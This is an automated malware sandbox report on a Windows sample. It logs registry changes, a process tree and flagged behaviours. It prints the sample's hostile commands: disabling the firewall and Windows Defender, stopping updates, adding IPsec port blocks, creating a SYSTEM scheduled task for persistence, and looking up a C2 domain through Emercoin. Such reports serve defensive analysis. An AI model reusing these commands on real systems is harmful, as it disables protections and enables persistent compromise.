(str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-55-95-89-9e-a2\WpadDecision = "0" bcvnbib.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-55-95-89-9e-a2\WpadDecisionReason = "1" bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{74C95E65-F65E-41E9-B96C-19C91BB3395D}\WpadDecisionTime = 102d251d500ddb01 bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{74C95E65-F65E-41E9-B96C-19C91BB3395D} bcvnbib.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{74C95E65-F65E-41E9-B96C-19C91BB3395D}\WpadDecision = "0" bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" bcvnbib.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{74C95E65-F65E-41E9-B96C-19C91BB3395D}\WpadDecisionReason = "1" bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-55-95-89-9e-a2\WpadDecisionTime = 102d251d500ddb01 bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bcvnbib.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bcvnbib.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{74C95E65-F65E-41E9-B96C-19C91BB3395D}\WpadNetworkName = "Network 3" bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings bcvnbib.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-55-95-89-9e-a2 bcvnbib.exe -
Modifies registry class 14 IoCs
Processes:
bcvnbib.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ bcvnbib.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs
Processes:
bcvnbib.exebcvnbib.exebcvnbib.exepid Process 1772 bcvnbib.exe 2560 bcvnbib.exe 2184 bcvnbib.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
vregocwxcwkxvjh21957.exebcvnbib.exepid Process 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2672 vregocwxcwkxvjh21957.exe 2480 bcvnbib.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exepid Process 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exebcvnbib.exebcvnbib.exesvchost.exedescription pid Process Token: SeDebugPrivilege 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe Token: SeDebugPrivilege 2872 bcvnbib.exe Token: SeDebugPrivilege 2480 bcvnbib.exe Token: SeAuditPrivilege 448 svchost.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exehentai.exevmtrwm.exebcvnbib.exehentai.exebcvnbib.exehentai.exevregocwxcwkxvjh21957.exebcvnbib.exehentai.exebcvnbib.exehentai.exebcvnbib.exehentai.exepid Process 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 784 hentai.exe 2580 vmtrwm.exe 2872 bcvnbib.exe 2900 hentai.exe 2480 bcvnbib.exe 2912 hentai.exe 2672 vregocwxcwkxvjh21957.exe 1772 bcvnbib.exe 812 hentai.exe 2560 bcvnbib.exe 2148 hentai.exe 2184 bcvnbib.exe 812 hentai.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.execmd.exebcvnbib.exebcvnbib.execmd.exedescription pid Process procid_target PID 2332 wrote to memory of 784 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 30 PID 2332 wrote to memory of 784 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 30 PID 2332 wrote to memory of 784 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 30 PID 2332 wrote to memory of 784 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 30 PID 2332 wrote to memory of 2920 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 31 PID 2332 wrote to memory of 2920 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 31 PID 2332 wrote to memory of 2920 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 31 PID 2332 wrote to memory of 2920 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 31 PID 2920 wrote to memory of 2192 2920 cmd.exe 33 PID 2920 wrote to memory of 2192 2920 cmd.exe 33 PID 2920 wrote to memory of 2192 2920 cmd.exe 33 PID 2920 wrote to memory of 2192 2920 cmd.exe 33 PID 2920 wrote to memory of 2872 2920 cmd.exe 35 PID 2920 wrote to memory of 2872 2920 cmd.exe 35 PID 2920 wrote to memory of 2872 2920 cmd.exe 35 PID 2920 wrote to memory of 2872 2920 cmd.exe 35 PID 2872 wrote to memory of 2900 2872 bcvnbib.exe 36 PID 2872 wrote to memory of 2900 2872 bcvnbib.exe 36 PID 2872 wrote to memory of 2900 2872 bcvnbib.exe 36 PID 2872 wrote to memory of 2900 2872 bcvnbib.exe 36 PID 2480 wrote to memory of 2912 2480 bcvnbib.exe 38 PID 2480 wrote to memory of 2912 2480 bcvnbib.exe 38 PID 2480 wrote to memory of 2912 2480 bcvnbib.exe 38 PID 2480 wrote to memory of 2912 2480 bcvnbib.exe 38 PID 2480 wrote to memory of 2672 2480 bcvnbib.exe 39 PID 2480 wrote to memory of 2672 2480 bcvnbib.exe 39 PID 2480 wrote to memory of 2672 2480 bcvnbib.exe 39 PID 2480 wrote to memory of 2672 2480 bcvnbib.exe 39 PID 2480 wrote to memory of 1964 2480 bcvnbib.exe 40 PID 2480 wrote to memory of 1964 2480 bcvnbib.exe 40 PID 2480 wrote to memory of 1964 2480 bcvnbib.exe 40 PID 2480 wrote to memory of 1964 2480 bcvnbib.exe 40 PID 2480 wrote to memory of 572 2480 bcvnbib.exe 42 PID 2480 wrote to memory of 572 2480 bcvnbib.exe 42 PID 2480 wrote to memory of 572 2480 bcvnbib.exe 42 PID 2480 wrote to memory of 572 2480 bcvnbib.exe 42 PID 2480 wrote to memory of 2856 2480 bcvnbib.exe 44 PID 2480 wrote to memory of 2856 2480 bcvnbib.exe 44 PID 2480 wrote to memory of 2856 2480 bcvnbib.exe 44 PID 2480 wrote to memory of 2856 2480 bcvnbib.exe 44 PID 2480 wrote to memory of 308 2480 bcvnbib.exe 46 PID 2480 wrote to memory of 308 2480 bcvnbib.exe 46 PID 2480 wrote to memory of 308 2480 bcvnbib.exe 46 PID 2480 wrote to memory of 308 2480 bcvnbib.exe 46 PID 308 wrote to memory of 1592 308 cmd.exe 48 PID 308 wrote to memory of 1592 308 cmd.exe 48 PID 308 wrote to memory of 1592 308 cmd.exe 48 PID 308 wrote to memory of 1592 308 cmd.exe 48 PID 308 wrote to memory of 1840 308 cmd.exe 49 PID 308 wrote to memory of 1840 308 cmd.exe 49 PID 308 wrote to memory of 1840 308 cmd.exe 49 PID 308 wrote to memory of 1840 308 cmd.exe 49 PID 2480 wrote to memory of 3028 2480 bcvnbib.exe 50 PID 2480 wrote to memory of 3028 2480 bcvnbib.exe 50 PID 2480 wrote to memory of 3028 2480 bcvnbib.exe 50 PID 2480 wrote to memory of 3028 2480 bcvnbib.exe 50 PID 2480 wrote to memory of 2340 2480 bcvnbib.exe 52 PID 2480 wrote to memory of 2340 2480 bcvnbib.exe 52 PID 2480 wrote to memory of 2340 2480 bcvnbib.exe 52 PID 2480 wrote to memory of 2340 2480 bcvnbib.exe 52 PID 2480 wrote to memory of 2392 2480 bcvnbib.exe 54 PID 2480 wrote to memory of 2392 2480 bcvnbib.exe 54 PID 2480 wrote to memory of 2392 2480 bcvnbib.exe 54 PID 2480 wrote to memory of 2392 2480 bcvnbib.exe 54
Processes
-
C:\Users\Admin\AppData\Local\Temp\53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe"C:\Users\Admin\AppData\Local\Temp\53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\hentai.exeC:\Users\Admin\AppData\Local\Temp\hentai.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:784
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gbmitiih\bcvnbib.exe2⤵
- Loads dropped DLL
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2192
-
-
C:\Windows\gbmitiih\bcvnbib.exeC:\Windows\gbmitiih\bcvnbib.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Users\Admin\AppData\Local\Temp\hentai.exeC:\Users\Admin\AppData\Local\Temp\hentai.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2900
-
-
-
-
C:\Windows\SysWOW64\vmtrwm.exeC:\Windows\SysWOW64\vmtrwm.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2580
-
C:\Windows\gbmitiih\bcvnbib.exeC:\Windows\gbmitiih\bcvnbib.exe1⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Indicator Removal: Clear Persistence
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\TEMP\hentai.exeC:\Windows\TEMP\hentai.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2912
-
-
C:\Windows\gbmitiih\vregocwxcwkxvjh21957.exeC:\Windows\gbmitiih\vregocwxcwkxvjh21957.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2672
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete all2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1964
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:572
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2856
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "itfiythrf" /ru system /tr "cmd /c C:\Windows\Fonts\bcvnbib.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:308 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "itfiythrf" /ru system /tr "cmd /c C:\Windows\Fonts\bcvnbib.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1840
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:3028
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2340
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2392
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2404
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2596
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1392
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:884
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1944
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1596
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2440
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1532
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1372
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:2492 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:1928 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:1584
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
PID:2592 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:1756
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:3052 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
PID:2892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:2872
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:2456 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:2772 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
PID:1624
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
PID:2176 -
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:2628
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:484 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:2644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2168 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2796 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2244 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin seed1.emercoin.com2⤵PID:2768
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin seed1.emercoin.com3⤵PID:3032
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin seed2.emercoin.com2⤵
- System Location Discovery: System Language Discovery
PID:3000 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin seed2.emercoin.com3⤵PID:2940
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 161.97.219.842⤵PID:1240
-
